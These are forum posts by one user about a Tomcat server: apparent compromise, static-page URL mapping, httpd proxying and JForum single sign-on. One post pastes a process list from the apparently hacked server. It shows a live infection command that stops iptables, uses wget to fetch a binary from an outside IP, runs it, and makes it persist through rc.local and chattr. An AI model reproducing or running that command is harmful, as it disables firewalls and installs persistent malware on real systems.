Sub Gowda

I know the entry. Basically I am not sure who started the other processes. I am not sure if my server was hacked. It randomly downloads and then runs some processes. Also, I becomes extremely slow.

So I was wondering, how best to secure the server.

Hi,

I have tomcat running on my server behind httpd. I have used proxy pass 80 to 8080. When I run ps -ef | grep tomcat, the below is the output. I am not sure what all these processes are. Can anyone please help me?

Thanks,
Sub



tomcat 5733 49851 0 Apr11 ? 00:00:00 /bin/bash /tmp/3 > /dev/null 9>&1 &
tomcat 8404 62257 0 11:41 ? 00:00:00 sleep 60
root 8420 1407 0 11:41 ? 00:00:00 sshd: tomcat [priv]
tomcat 8456 8420 0 11:41 ? 00:00:00 sshd: tomcat@pts/0
tomcat 8457 8456 0 11:41 pts/0 00:00:00 -bash
tomcat 8662 59836 0 11:41 ? 00:00:00 sleep 60
tomcat 8750 60478 0 11:41 ? 00:00:00 sleep 60
tomcat 8857 49388 0 11:41 ? 00:00:00 sh -c killall /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://122.224.52.75:9988/akromroot;chmod 777 akromroot;./akromroot;echo "cd /tmp/">>/etc/rc.local;echo "./akromroot&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;chattr +i akromroot;chattr +i /tmp/akromroot;
tomcat 8869 8857 0 11:41 ? 00:00:00 wget -c http://122.224.52.75:9988/akromroot
tomcat 8870 8457 1 11:41 pts/0 00:00:00 ps -ef
tomcat 8871 8457 0 11:41 pts/0 00:00:00 grep tomcat
tomcat 16053 1 0 Apr11 ? 00:00:21 /tmp/iuk.6 > /dev/null 2>&1 &
tomcat 26178 1 0 Apr11 ? 00:00:00 /usr/local/apache-tomcat-7.0.59/bin/freeBSD /usr/local/apache-tomcat-7.0.59/bin/freeBSD 1
tomcat 26322 1 0 00:19 ? 00:01:34 ./da &
tomcat 26326 49851 0 Apr11 ? 00:00:03 ./ruofeng &
tomcat 26373 49851 0 Apr11 ? 00:00:03 ./ruofeng &
tomcat 37635 64579 0 Apr11 ? 00:00:00 cp /usr/bin/wget .
tomcat 41036 1 0 Apr10 ? 00:00:59 /tmp/.lz1428645679
tomcat 41383 64469 0 Apr11 ? 00:00:00 /bin/bash ./2 &
tomcat 42081 64469 0 Apr11 ? 00:00:00 cp /usr/bin/wget .
tomcat 42749 5733 0 Apr11 ? 00:00:00 /bin/bash /tmp/3 > /dev/null 9>&1 &
tomcat 43412 5733 0 Apr11 ? 00:00:00 chmod 755 /etc/aa
tomcat 45956 1 97 Apr11 ? 20:10:20 /tmp/dage > /dev/null 9>&1 &
tomcat 45957 45956 0 Apr11 ? 00:00:00 /tmp/dage > /dev/null 9>&1 &
tomcat 45958 45957 0 Apr11 ? 00:00:09 /tmp/dage > /dev/null 9>&1 &
tomcat 46067 1 96 Apr11 ? 20:09:57 /tmp/dage > /dev/null 9>&1 &
tomcat 46068 46067 0 Apr11 ? 00:00:00 /tmp/dage > /dev/null 9>&1 &
tomcat 46069 46068 0 Apr11 ? 00:00:10 /tmp/dage > /dev/null 9>&1 &
tomcat 49388 1 0 Apr10 ? 00:15:30 /tmp/SettingMk > /dev/null 2>&1 &
tomcat 49851 1 0 Apr10 ? 00:02:15 /usr/bin/java -Djava.util.logging.config.file=/usr/local/apache-tomcat-7.0.59/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.endorsed.dirs=/usr/local/apache-tomcat-7.0.59/endorsed -classpath /usr/local/apache-tomcat-7.0.59/bin/bootstrap.jar:/usr/local/apache-tomcat-7.0.59/bin/tomcat-juli.jar -Dcatalina.base=/usr/local/apache-tomcat-7.0.59 -Dcatalina.home=/usr/local/apache-tomcat-7.0.59 -Djava.io.tmpdir=/usr/local/apache-tomcat-7.0.59/temp org.apache.catalina.startup.Bootstrap start
tomcat 59249 1 0 Apr10 ? 00:00:42 ./wraiuk.6 &
tomcat 59836 49851 0 Apr11 ? 00:00:01 /bin/bash ./1 &
tomcat 60478 49851 0 Apr11 ? 00:00:01 /bin/bash ./1 &
tomcat 62257 49851 0 Apr11 ? 00:00:01 /bin/bash ./1 &
tomcat 63958 64299 0 Apr11 ? 00:00:00 chmod 755 /etc/mm
tomcat 64299 49851 0 Apr11 ? 00:00:00 /bin/bash ./2
tomcat 64343 1 6 Apr11 ? 01:36:31 /tmp/dage > /dev/null 9>&1 &
tomcat 64344 64343 0 Apr11 ? 00:00:00 [dage] <defunct>
tomcat 64345 1 0 Apr11 ? 00:00:12 /tmp/dage > /dev/null 9>&1 &
tomcat 64469 49851 0 Apr11 ? 00:00:00 /bin/bash ./2 &
tomcat 64579 49851 0 Apr11 ? 00:00:00 /bin/bash ./2 &

Thanks, I did that. I backed up ROOT folder and then renamed my application.war file to ROOT.war and tomcat deployed it as ROOT. I can see my web application on http://localhost
But i still cannot see my static pages. My static pages are in /usr/share/website/, which is not my in webapps directory(/usr/local/tomcat7/webapps/). My application creates a lot of static (html) pages and is saved in /usr/share/website/. This location is Alias to myfolder in my web application.

example: when some one uses my web application, a new folder with html pages are created and saved in /usr/share/website (myfolder). Lets say the new folder is called "sub".

Now when i point my browser to http://localhost/myfolder/sub/index.html i can see the content of index.html, but
I want the browser to show me the content of index.html, when i use http://localhost/sub/index.html (as of now i see a 404 error)

Basically, I don't want the users to see the word "myfolder" in the URL.

Actually I have removed Apache from my system. I have only tomcat 7 on port 80. I followed your suggestion on the earlier post and decided to use only tomcat for both dynamic and static content.

I am still having the same issue as earlier. I want the below to work. Please help..

http://localhost/myfolder/sub/index.html works, but I want it to show as http://localhost/sub/index.html and
http://localhost/myfolder/static1.html works. but i want the url to look like http://localhost/static1.html

Hi,

Thanks for the reply. I am trying your suggestion and use tomcat to serve my static content also. I still get to see the folder name in the URL where my static pages are stored.

I have multiple directories and static pages inside "myfolder" and I dont want to display "myfolder" in the url. I am ok with displaying the directory names.

example:http://localhost/myfolder/sub/index.html works, but I want it to show as http://localhost/sub/index.html and
http://localhost/myfolder/static1.html works. but i want the url to look like http://localhost/static1.html


Could you please help me out?

Thanks,
Sub

Hi,

I am not sure if this is the correct forum to request help, but I could not find a better place. I am trying to setup an httpd server in front of tomcat on centos 5.8.
In the httpd.conf file I have written the below

ProxyRequests off
ProxyPreserveHost on
ProxyPass /static.htm !
ProxyPass / http://localhost:8082/
ProxyPassReverse / http://localhost:8082/

This works fine if I have only 1 static page. I have a little over 34 static pages. Could you please help me figure out how to have multiple static pages serviced by httpd and others go to tomcat?

http://localhost/static1.html ==> static page 1
http://localhost/static2.html ==> static page 2

http://localhost/ ==> should goto tomcat's webapp

Thanks,
Sub

Hi Mike,

How did you get the SSO thing to work? if you could help me out it would be wonderful. I tried the cookie method and it does not seem to work for me.

thanks,
Subhash

Mike Arzuna wrote:This is probably a old thread, but I could not find a place to post this on jforum website. so here it is. We recently integrated jforums into our site. We found jforum so flexible and it was a breeze inegrating it into our application. We needed to write a custom SSO hook to integrate with the app and needed to skin the CSS (still working on it). I did find few minor issues, but they were not show stoppers for us. Thank you for a great product. Here is the link to our community forums: http://www.avaniplants.com/planttalk

Hello,

I have a web application in one server and I need to deploy jforum into another server, each with its own apache tomcat and mysql. My web application has a login page and related databases tables.

The scenario is, I already have the web application running on my website. I want to put in another menu item on the website called forum which points to Jforum. But I want the users who are already logged in to the my web application to be logged into the forum as well. Its like, someone logged in to the website is automatically logged into the forum.

I would like to implement sso as part of my application. So should I pass on the login credentials to jforum. or is it possible to use Jforum's SSO with my webapp.

thanks,
Sub

Hello Jeanne,

I was going through the forum and I found a thread on JForum integration. (https://coderanch.com/t/578824/jforum/integrate-jforum-project-eclipse)
I was wondering how to Place the jar inside the project and use the binary. I am thinking you mean, Use JForum as a library in my Web Application?? If so I would really appreciate you shedding some light on how to accomplish that with Eclipse?

On a different perspective
I have a web application in one server and I need to deploy jforum into another server, with its own tomcat and mysql. I would like to implement sso as part of my application. So should I pass on the login credentials to jforum. or is it possible to use Jforum's SSO with my webapp.

thanks,
Sub

Thanks for your help

Thanks Jeanne, I think I will do multiple instances of Jforum. I will have to write one code in which if the SuperAdmin changes his/her password, it should be reflected in all the forums.

Do you guys have anything on Single Sign On? I want the users who are logged into my website to be automatically logged into the forum as well.

Hello,

I want to create a forum for my University. I have some requirements and I wanted to know if I could use JForum for it. I know it is a long post, but please do help me out.

1. There should be one forum software / one database.
2. The forum should be divided into 4 parts
- Electrical Engineering
- Computer Science Engineering
- Applied Science
- Arts
3. There should be one super admin
- This super admin will create the part admins and have access to all users and topics
4. There should be admins for each of the part called part admin
- This part admin will be responsible for only his part of the forum
- This includes the creation of new users, deleting users and all forum functionality within his part.
5. An admin and members of one part must not see/access the other parts forum
- Example: an arts admin cannot create a new user in Applied science, this admin can create only users and topics in arts part.
- Example: an arts student can post/reply/answer any thread only in the arts part and in no other part.
6. There should be a control panel for each part admin, but limited to only his part.
7. There should a single sign on i.e. When the student logs into the university website, he should be automatically logged into the forum as well.


thanks,
Sub